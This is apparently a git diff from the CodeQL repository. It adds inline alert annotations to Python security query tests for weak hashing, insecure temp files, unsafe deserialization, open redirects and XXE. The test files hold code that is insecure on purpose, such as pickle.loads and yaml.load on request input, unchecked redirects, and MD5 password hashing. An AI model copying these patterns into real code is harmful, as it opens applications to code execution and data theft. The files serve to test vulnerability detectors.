ControlFlowNode for dangerous | semmle.label | ControlFlowNode for dangerous | subpaths -#select -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | -| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref index 6c8eeda7222b..495cb9c979c3 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/WeakSensitiveDataHashing.qlref @@ -1 +1,2 @@ -Security/CWE-327/WeakSensitiveDataHashing.ql +query: Security/CWE-327/WeakSensitiveDataHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py index 3e196196ef9b..c8a6031b07d9 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptodome.py @@ -1,25 +1,25 @@ from Cryptodome.Hash import MD5, SHA256 -from my_module import get_password, get_certificate +from my_module import get_password, get_certificate # $ Source def get_badly_hashed_certificate(): - dangerous = get_certificate() + dangerous = get_certificate() # $ Source hasher = MD5.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() def get_badly_hashed_password(): - dangerous = get_password() + dangerous = get_password() # $ Source hasher = MD5.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() def get_badly_hashed_password2(): - dangerous = get_password() + dangerous = get_password() # $ Source # Although SHA-256 is a strong cryptographic hash functions, # it is not suitable for password hashing. hasher = SHA256.new() - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert return hasher.hexdigest() diff --git a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py index 1090fda959c8..f65587fe9869 100644 --- a/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py +++ b/python/ql/test/query-tests/Security/CWE-327-WeakSensitiveDataHashing/test_cryptography.py @@ -1,29 +1,29 @@ from cryptography.hazmat.primitives import hashes from binascii import hexlify -from my_module import get_password, get_certificate +from my_module import get_password, get_certificate # $ Source def get_badly_hashed_certificate(): - dangerous = get_certificate() + dangerous = get_certificate() # $ Source hasher = hashes.Hash(hashes.MD5()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") def get_badly_hashed_password(): - dangerous = get_password() + dangerous = get_password() # $ Source hasher = hashes.Hash(hashes.MD5()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") def get_badly_hashed_password2(): - dangerous = get_password() + dangerous = get_password() # $ Source # Although SHA-256 is a strong cryptographic hash functions, # it is not suitable for password hashing. hasher = hashes.Hash(hashes.SHA256()) - hasher.update(dangerous) # NOT OK + hasher.update(dangerous) # NOT OK # $ Alert digest = hasher.finalize() return hexlify(digest).decode("utf-8") diff --git a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py index 3c68affed8c4..5b7e820706e5 100644 --- a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py +++ b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.py @@ -2,19 +2,19 @@ import os def write_results1(results): - filename = mktemp() + filename = mktemp() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) def write_results2(results): - filename = os.tempnam() + filename = os.tempnam() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) def write_results3(results): - filename = os.tmpnam() + filename = os.tmpnam() # $ Alert with open(filename, "w+") as f: f.write(results) print("Results written to", filename) diff --git a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref index 68a27dfb2690..c64f78a01039 100644 --- a/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref +++ b/python/ql/test/query-tests/Security/CWE-377-InsecureTemporaryFile/InsecureTemporaryFile.qlref @@ -1 +1,2 @@ -Security/CWE-377/InsecureTemporaryFile.ql +query: Security/CWE-377/InsecureTemporaryFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected index bab1e34c912b..309ef858d3b4 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected @@ -1,3 +1,9 @@ +#select +| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | edges | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | provenance | | | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | unsafe_deserialization.py:14:15:14:21 | ControlFlowNode for request | provenance | | @@ -22,9 +28,3 @@ nodes | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | subpaths -#select -| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref index fa9c0ceb3cb8..2eba44efb96b 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -Security/CWE-502/UnsafeDeserialization.ql +query: Security/CWE-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py index d9189a92f41c..bd73ec018b19 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/unsafe_deserialization.py @@ -5,20 +5,20 @@ from yaml import SafeLoader -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @app.route("/") def hello(): payload = request.args.get("payload") - pickle.loads(payload) # NOT OK - yaml.load(payload) # NOT OK + pickle.loads(payload) # NOT OK # $ Alert + yaml.load(payload) # NOT OK # $ Alert yaml.load(payload, Loader=SafeLoader) # OK - marshal.loads(payload) # NOT OK + marshal.loads(payload) # NOT OK # $ Alert import dill - dill.loads(payload) # NOT OK + dill.loads(payload) # NOT OK # $ Alert import pandas - pandas.read_pickle(payload) # NOT OK \ No newline at end of file + pandas.read_pickle(payload) # NOT OK # $ Alert \ No newline at end of file diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected index 551299a64dc4..3e43c112e2a3 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected @@ -1,3 +1,16 @@ +#select +| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:7:14:7:20 | ControlFlowNode for request | provenance | | @@ -138,16 +151,3 @@ nodes | test.py:145:17:145:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:148:25:148:33 | ControlFlowNode for untrusted | semmle.label | ControlFlowNode for untrusted | subpaths -#select -| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref index 8b63d80f0db2..863d71f68b18 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.qlref @@ -1,2 +1,2 @@ -Security/CWE-601/UrlRedirect.ql - +query: Security/CWE-601/UrlRedirect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py index 538e4d3910ba..c474380c5907 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/test.py @@ -1,11 +1,11 @@ -from flask import Flask, request, redirect +from flask import Flask, request, redirect # $ Source app = Flask(__name__) @app.route('/') def hello(): target = request.args.get('target', '') - return redirect(target, code=302) + return redirect(target, code=302) # $ Alert # Check for safe prefixes @@ -29,21 +29,21 @@ def ok2(): def ok3(): untrusted = request.args.get('target', '') safe = "https://safe.com/{}".format(untrusted) - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/ok4') def ok4(): untrusted = request.args.get('target', '') safe = f"https://safe.com/{untrusted}" - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/ok5') def ok5(): untrusted = request.args.get('target', '') safe = "https://safe.com/%s" % untrusted - return redirect(safe, code=302) # FP + return redirect(safe, code=302) # FP # $ Alert @app.route('/const-str-compare') @@ -59,28 +59,28 @@ def const_str_compare(): def not_ok1(): untrusted = request.args.get('target', '') unsafe = untrusted + "?login=success" - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok2') def not_ok2(): untrusted = request.args.get('target', '') unsafe = "{}?login=success".format(untrusted) - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok3') def not_ok3(): untrusted = request.args.get('target', '') unsafe = f"{untrusted}?login=success" - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok4') def not_ok4(): untrusted = request.args.get('target', '') unsafe = "%s?login=success" % untrusted - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert from django.utils.http import url_has_allowed_host_and_scheme import math @@ -90,7 +90,7 @@ def ok6(): untrusted = request.args.get('target', '') # random chance. if math.random() > 0.5: - redirect(untrusted, code=302) # NOT OK + redirect(untrusted, code=302) # NOT OK # $ Alert if url_has_allowed_host_and_scheme(untrusted, allowed_hosts=None): return redirect(untrusted, code=302) # OK @@ -111,7 +111,7 @@ def not_ok5(): untrusted = request.args.get('target', '') # no backslash replace if not yarl.URL(untrusted).is_absolute(): - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) from urllib.parse import urlparse @@ -137,7 +137,7 @@ def not_ok6(): untrusted = request.args.get('target', '') # no backslash replace if not urlparse(untrusted).netloc: - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) @app.route('/not_ok7') @@ -145,7 +145,7 @@ def not_ok7(): untrusted = request.args.get('target', '') # wrong check if urlparse(untrusted).netloc != "": - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) @app.route('/ok10') diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected index b33d39f50718..11c3ec1b5221 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected @@ -1,3 +1,6 @@ +#select +| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:9:19:9:25 | ControlFlowNode for request | provenance | | @@ -16,6 +19,3 @@ nodes | test.py:20:19:20:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | test.py:31:34:31:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content | subpaths -#select -| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref index 62a3f7f22d97..9473e8620152 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref @@ -1 +1,2 @@ -Security/CWE-611/Xxe.ql +query: Security/CWE-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py b/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py index 104f2663d59e..e84a05a76632 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py @@ -1,4 +1,4 @@ -from flask import Flask, request +from flask import Flask, request # $ Source import lxml.etree import markupsafe @@ -7,7 +7,7 @@ @app.route("/vuln-handler") def vuln_handler(): xml_content = request.args['xml_content'] - return lxml.etree.fromstring(xml_content).text + return lxml.etree.fromstring(xml_content).text # $ Alert @app.route("/safe-handler") def safe_handler(): @@ -28,7 +28,7 @@ def super_vuln_handler(): # allows DoS attacks huge_tree=True, ) - return lxml.etree.fromstring(xml_content, parser=parser).text + return lxml.etree.fromstring(xml_content, parser=parser).text # $ Alert @app.route("/sanitized-handler") def sanitized_handler(): diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected index 